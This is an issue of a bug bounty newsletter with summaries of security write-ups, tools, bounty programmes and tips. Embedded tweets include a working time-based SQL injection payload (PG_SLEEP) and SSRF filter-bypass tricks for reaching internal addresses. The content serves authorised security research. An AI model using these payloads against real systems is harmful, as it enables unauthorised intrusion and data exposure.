- Disclosed.
- Posts
- Disclosed. August 23, 2025. RCE on 1M Repos, €230K Swiss Post Bounty, Zoom Multiplier, and More
Disclosed. August 23, 2025. RCE on 1M Repos, €230K Swiss Post Bounty, Zoom Multiplier, and More
The bug bounty world, curated.
Harley Kimball (@infinitelogins)
August 23, 2025
Welcome to Disclosed.
Each week, 3 readers will win a 1-month PentesterLab Pro license, completely free. Refer a friend to the newsletter to enter.
Shout out to this week’s winners (I will email you):
sop608.so
boy.binary0101
arthur.h
PentesterLab is one of the best hands-on platforms for learning web security, with real-world vulnerabilities, private labs, and practical exercises trusted by professionals and bug bounty hunters worldwide.
Huge thanks to PentesterLab for sponsoring this giveaway and supporting the Disclosed. community. ❤️
By the way, referrals are so low right now that almost everyone who has referred someone has received a PentesterLab license. Your chances of being selected are VERY HIGH
Hey everyone! I’m finally back home from DEF CON and catching up on everything I put off during Bug Bounty Village 😅 Huge thanks to everyone who came out and showed support. The energy this year was amazing with packed talks, hallway chats, and a strong community vibe. We put together a brief recap that you can read here.
One of the best things about post-DEF CON is the flood of research and write-ups it inspires. This month I’ve noticed a huge spike in write-ups, which pulled me down more than a few rabbit holes while putting this drop together. The “Write-Up” section is a bit longer this time, and I highly recommend reading those. The quality is excellent, and I’m definitely feeling inspired to get out there hunting.
Anyway, let’s dive in.
In This Issue
Exploiting CodeRabbit: From a Simple PR to RCE and Write Access on 1M Repositories [📓 Blog]
by Kudelski Security Research
This article documents the exploitation of vulnerabilities in the CodeRabbit AI code review tool, leading to remote code execution on production servers and unauthorized access to one million repositories. It highlights the use of Rubocop for arbitrary code execution through crafted configuration files, as well as the effective remediation process by CodeRabbit.
Read more →
Hiring CTF Challenge Creators for Remote Position [🔗 Tweet]
by Luke Stephens (hakluke)
This tweet announces a job opening for creating Capture The Flag (CTF) challenges, highlighting the requirement for experience and English proficiency.
See more →
Calling all CTF creators. 🗣️
Want a job where you create CTF challenges all day, every day?
That is exactly what I'm hiring. Fully remote, flexible hours.
Requirements:
- Must have experience creating CTF challs (not just playing them)
- Excellent English proficiency
- Great— Luke Stephens (hakluke) (@hakluke)
7:39 PM • Aug 20, 2025
Lessons from 9 Months of Bug Bounty Research [🔗 Tweet]
by James Kettle
The tweet promotes a 40-minute talk summarizing nine months of bug bounty research, underscoring the significance of persistence and problem-solving in the field.
See more →
When I condense nine months of research discoveries into a 40-min talk, it can make it seem easy. For a taster of the true experience, watch my battle to solve the 0-CL @WebSecAcademy lab! Research is persistence.
— James Kettle (@albinowax)
2:43 PM • Aug 21, 2025
NahamSec’s Def Con 33 Recap Video [🔗 Video]
by NahamSec
In his DEF CON 33 vlog, NahamSec takes viewers behind the scenes of the four-day event—highlighting hacker communities, village setups, parties, talks, and exclusive moments with friends and fellow researchers. The video captures the energy of the Bug Bounty Village, panels, and keynote talks.
Watch the full video →
Have something you want to Spotlight? Tell me.
Swiss Post Intrusion Test Offering Rewards up to €230,000 [🔗 Link]
by YesWeHack
Swiss Post is running its annual Public Intrusion Test with rewards reaching as high as €230,000 per valid report. Even medium-tier findings pay €40,000, and write-in fields are in scope for the first time. The event is time-limited and concludes on 24 August.
Read the full details →
New Zoom Bug Bounty Campaign [🔗 Tweet]
by Roy Davis
A new bug bounty campaign for Zoom Hub launches next Monday with a 1.25x bounty multiplier, encouraging researchers to participate.
See more →
hey @Zoom#BugBounty researchers! New Campaign starting next Monday focused on Zoom Hub (support.zoom.com/hc/en/article?…). 1.25x Bounties! Get Hacking!
— Roy Davis (@Hack_All_Things)
4:28 PM • Aug 22, 2025
HackerOne AI Red Team CTF Challenge This September [🔗 Tweet]
by HackerOne
This tweet announces a full-length AI Red Team CTF competition in collaboration with Hack The Box, inviting security researchers to compete and earn rewards.
See more →
Security researchers, we’re launching a full-length AI Red Team CTF with @hackthebox_eu this September:
A multi-flag, adversarial LLM challenge series.
Play from anywhere. Climb the leaderboard.
Unlock exclusive swag.
Registration is open now: 🔗 bit.ly/4oGQ6mA
— HackerOne (@Hacker0x01)
11:08 AM • Aug 22, 2025
HackerOne Belgium Ambassador Hosted Event [🔗 Tweet]
by drop
The tweet announces the inaugural HackerOne Belgium event, designed for the Belgian bug bounty community to promote collaboration and knowledge sharing.
Read the full tweet →
🚀 Go BIG or go home, they said! So we decided to go BIG for the very first HackerOne Belgium event!
We are excited to announce the first-ever HackerOne Belgium event, created especially for the Belgian bug bounty community.
This event will bring you a fully virtual live
— drop (@dropn0w)
4:00 PM • Aug 21, 2025
Did I miss an important update? Tell me.
Autoswagger — Open Source API Authorization Scanner [📁 Tool]
by intruder-io
Autoswagger is a free command-line tool that automatically scans Swagger/OpenAPI endpoints for broken authorization, secrets, and PII leaks.
Read more →
Introducing JsonViewer: A New Tool for Better JSON Handling [🔗 Tweet]
by @_Freakyclown_
Announcing JsonViewer, a tool designed to streamline JSON data navigation with features like table views and bookmarks, beneficial for both developers and researchers.
Read the full thread →
New tool drop: JsonViewer 🚀
Stop scrolling through JSON like a raccoon in a dumpster.
👉 Clean, searchable tables
👉 Bookmarks, filters, exports
👉 Runs in your terminal (SSH/VPS/local)
GitHub:
YouTube demo: youtube.com/watch?v=j8yrV7…
make JSON suck less.— freakyclown (@_Freakyclown_)
6:43 PM • Aug 22, 2025
From Nmap to Real-Time Internet Maps with IVRE: A Step-by-Step Playbook [📓 Blog]
by Very Lazy Tech
This blog post presents a detailed guide on utilizing IVRE to create real-time internet maps from Nmap scan data, providing key commands and initialization steps to enhance network analysis for penetration testers.
Read more →
secrets-ninja: GUI Tool for API Key Validation [📁 Tool]
by NikhilPanwar
Secrets Ninja is a GUI tool for validating and investigating API keys discovered during pentesting and bug bounty hunting, designed to be extensible and user-friendly.
View the tool →
New Tool for CSS Injection Token Leaks [🔗 Tweet]
by André Baptista
This tweet highlights a new tool that utilizes CSS injection techniques to leak sensitive tokens effortlessly in browsers.
Read the full thread →
Typical CSS injection often relies on repeated context loading (usually via iframes) to exfiltrate sensitive tokens.
I found this tool by @ixSly that's both fast and works in Chrome and Safari. It can leak tokens with just a single CSS import by leveraging -webkit-cross-fade 🤯
— André Baptista (@0xacb)
9:03 AM • Aug 20, 2025
New Repeater Feature for Exploring Request Smuggling [🔗 Tweet]
by James Kettle
Announcing a 'Retry until success' feature in a tool automating request testing, advantageous for discovering request smuggling vulnerabilities.
Read the full thread →
I just published a Repeater feature to make it easier to explore request smuggling. It repeats your request until the status code changes. It's called "Retry until success" and you can install it via the Extensibility helper bapp.
— James Kettle (@albinowax)
3:01 PM • Aug 20, 2025
Have a favorite tool? Tell me.
From PDF to Five-Figure Payday: When Legacy Docs Attack [📓 Blog]
by Armand Jasharaj (@_Zer0Sec_)
In under 30 minutes, the researcher turned a series of minor misconfigurations, discovered via forced browsing and IIS tilde enumeration, into a critical-severity bug, culminating in a five-figure bounty after retrieving PII from an internal admin portal that was exposed through a blurry legacy PDF screenshot.
From RPM Repository to Account Compromise [🔗 Article]
by Phil (@yppip)
In this write-up, Phil details how he discovered an unauthenticated JSON endpoint exposing RPM packages, which he automatedly downloaded and analyzed—uncovering hardcoded employee credentials that allowed a full account takeover.
Read the full write-up →
Zero-Click Account Takeover Leading to Admin Access [🔗 Tweet]
by @tbbhunter
A researcher discovered an SSO misconfiguration, a self-XSS, and a cache poisoning issue, chaining them to achieve a 0-click account takeover in the wild. The finding earned a five-digit bounty and highlighted the complexity of hidden cache poisoning surfaces and WAF evasion.
See more →
Using Microsoft SSO to Achieve Full Account Takeover [📓 Blog]
by SECarius
This post details a method for exploiting a vulnerability in a Microsoft Single Sign-On (SSO) service that leads to full account takeover. It discusses identifying the vulnerable asset with a custom tool and dissects the authentication logic to reveal a critical flaw involving hardcoded credentials. Techniques like JavaScript code analysis and OSINT are also highlighted.
Read more →
Using AFL++ on bug bounty programs: an example with Gnome libsoup [📓 Blog]
by Almond Offensive Security Blog
This article outlines the application of AFL++ for fuzzing the Gnome libsoup library within a bug bounty program. It covers setup using Docker, custom harness creation, and the discovery of an out-of-bounds write vulnerability. Key insights include harness optimization and the importance of reproducibility for reporting vulnerabilities.
Read more →
Bypassing Authentication with a Single Request [📓 Blog]
by aj-09
This narrative describes discovering an undocumented API endpoint that allows authentication bypass with a single HTTP request, emphasizing exploration beyond API documentation. It showcases the technical aspects alongside the necessary mindset for effective bug hunting.
Read more →
Insightly | Report #2718253 - Email verification bypass [📓 Report]
by HackerOne
This report details an email verification bypass vulnerability in the Insightly signup process. By altering the 'EmailAddress' parameter in the signup request, attackers can create accounts with existing email addresses, posing significant risks. The submission includes steps to reproduce and validates the exploit.
Read more →
How I found an RCE seconds after its publication [📓 Blog]
by SECarius
This article describes the swift discovery of an RCE vulnerability within an n8n instance right after its deployment, utilizing alerts from the Profundis service. It emphasizes the importance of timely alerts and discusses potential risks like privilege escalation when gaining shell access.
Read more →
Did I miss an important update? Tell me.
Bug Bounty Guide: XXE Injection Explained with Real Reports [🎥 Video]
by Medusa
This video provides a breakdown of XXE Injection, detailing how it can be exploited in bug bounty hunting.
Watch video →
Exploring Complexion Hierarchies for IDOR Discoveries [🎥Video]
by Bugcrowd
A new Entrylevel Exploits video, made in partnership with Bugcrowd, breaks down reflected XSS for beginners—covering payloads, filters, DOM XSS, and real-world bug bounty strategies to help hunters land their first valid report.
Watch the video →
Permission hierarchies hide more than just IDORs.
Keep an eye out for complexion hierarchies and surface IDORs, understanding those levels is how you land the big finds 🤑
🎥: @InsiderPhDyoutube.com/watch?v=-MsjH-…
— bugcrowd (@Bugcrowd)
6:17 PM • Aug 22, 2025
Exploring Government Cybersecurity with Jack Cable [🎥Video]
by Critical Thinking - Bug Bounty Podcast
In the latest podcast episode, Jack Cable discusses his Cluely hack experience and the legal challenges faced by hackers, shedding light on government cybersecurity initiatives.
See more →
Exploit Remote Code Execution via Predictable Tokens [🎥Video]
by YesWeHack ⠵
A new video walkthrough of the CCTV Manager challenge shows how predictable Python tokens seeded with system time combined with unsafe YAML loading can be exploited to achieve remote code execution.
See more →
How to find XSS via SSRF [🎥 Video]
by Bug Bounty With Marco
A researcher exploited an outdated Jira instance to chain an SSRF into reflected XSS, enabling them to inject payloads via consumer URLs and replicate the bug across multiple high-profile targets including Motorola, government sites, and universities.
Watch video →
Did I miss something? Tell me.
Vulnerability Vectors: SQL Injection for Bug Bounty Hunters [🔗 Blog]
by YesWeHack
This guide overs a range of SQL injection techniques for bug bounty hunters, overviews simple and advanced methods (like Boolean‑based, UNION, blind, time‑based, OOB, and second‑order SQLi), and provides tips for crafting payloads and bypassing WAFs to detect and exploit vulnerabilities.
Read more →
The Guide to Blind XSS: Advanced Techniques for Bug Bounty Hunters Worth $250,000 [🔗 Blog]
by Bugcrowd
This guide teaches hunters to adopt patience and strategy—crafting blind XSS payloads in workflows like support tickets, order processing, or admin dashboards, where multi-system propagation can trigger execution later and potentially multiply bounty value.
Read more →
A guide to path traversal and arbitrary file read attacks [📓 Blog]
by YesWeHack
This guide explains path traversal and arbitrary file read attacks, detailing detection and exploitation techniques while discussing resolution strategies in various programming languages.
Read more →
Portswigger Server-side template injection — Expert [📓 Blog]
by Mike (sl0th0x87)
This post investigates a Server-Side Template Injection (SSTI) vulnerability in the Freemarker template engine, detailing how an attacker can exploit misconfigured sandboxes for arbitrary file reads. Practical exploitation examples are provided.
Read more →
Slides on Hacking Stripe Integrations Released [🔗 Tweet]
by Ananda Dhakal
The post shares slides on exploiting Stripe integrations to bypass e-commerce payments, with a more detailed blog coming soon for further insights.
Read the full thread →
Did I miss something? Tell me.
Finding Critical Bugs in Exposed .git Directories [🔗 Tweet]
by Abhishek Meena - {🔥}
The tweet warns about sensitive information at risk due to improperly configured .git directories, underscoring a common yet critical finding in bug bounty hunting.
Read the full thread →
Thread: 1/4
Bug Bounty Tip 🧵: Your next critical finding might be hiding in a publicly exposed .git directory.
It's a common misconfiguration that leaks the entire code history, including secrets, old endpoints, and unpatched vulns.
#bugbountytips#infosec
— Abhishek Meena - {🔥} (@aacle_)
5:37 PM • Aug 22, 2025
SQL Injection Payload Delivers $2,000 Bounty on Hacker0x01 [🔗 Tweet]
by Lu3ky13 ⚡️⚡️
This tweet highlights an SQL injection payload that earned a $2,000 bounty on Hacker0x01, showcasing the potential of exploiting delays via PG_SLEEP.
Read the full thread →
SQL injection
Payload
"startDate": "2025-04-03d' AND 1=(SELECT 1 FROM PG_SLEEP(10)) OR '1'='0
Yay, I was awarded a $2,000 bounty on @Hacker0x01! #TogetherWeHitHarder— Lu3ky13 ⚡️⚡️ (@lu3ky13)
6:39 AM • Aug 19, 2025
Bypassing 302 Redirects to Access API Documentation [🔗 Tweet]
by Arshiya
This tweet describes a method for bypassing a 302 redirect to access API documentation, providing a useful tip for bug bounty hunters.
Read the full thread →
redacted[.]com/ --> [302]❌
redacted[.]com/app/api/doc/ --> [200 OK] ✅
Bypassed the 302 and hit API doc gold!
#bugbountytips #BugBounty— Arshiya (@arshiyaiha)
5:56 PM • Aug 19, 2025
Bypassing SSRF Restrictions in Webhook Applications [🔗 Tweet]
by 0xRAYAN 🇸🇦
The tweet outlines techniques for bypassing SSRF restrictions in webhooks, including various redirection methods and userinfo injection.
Read the full thread →
💡 Bug Bounty Tip - SSRF Bypass in Webhooks
Some apps block 127.0.0.1 or metadata URLs, but you can bypass it:
1️⃣ 303 Redirect → Host a page that redirects to an internal URL
2️⃣ DNS Rebinding → Use 127.0.0.1.nip.io (resolves to localhost)
3️⃣ Userinfo Injection →— 0xRAYAN 🇸🇦 (@0xRAYAN7)
4:47 PM • Aug 20, 2025
New Technique for Bypassing Akamai and Cloudflare WAFs [🔗 Tweet]
by VIEH Group
This tweet introduces a newly discovered method to bypass Web Application Firewalls (WAFs) such as Akamai and Cloudflare, providing actionable insights for bug bounty hunters.
Read the full thread →
Bug Bounty tips 👀
New WAF Bypass Discovered - Akamai & Cloudflare 🔥A fresh technique has been spotted that successfully bypasses WAFs like Akamai and Cloudflare.
#Exploit#WAFBypass#XSS#Cloudflare#Akamai#WebSecurity#BugBounty#bugbountytips
— VIEH Group (@viehgroup)
8:00 AM • Aug 21, 2025
Did I miss something? Tell me.
Did you like this week's drop?Please share feedback. |
Because Disclosure Matters: This newsletter was produced with the assistance of AI. While I strive for accuracy and quality, not all content has been independently vetted or fact-checked. Please allow for a reasonable margin of error. The views expressed are my own and do not reflect those of my employer.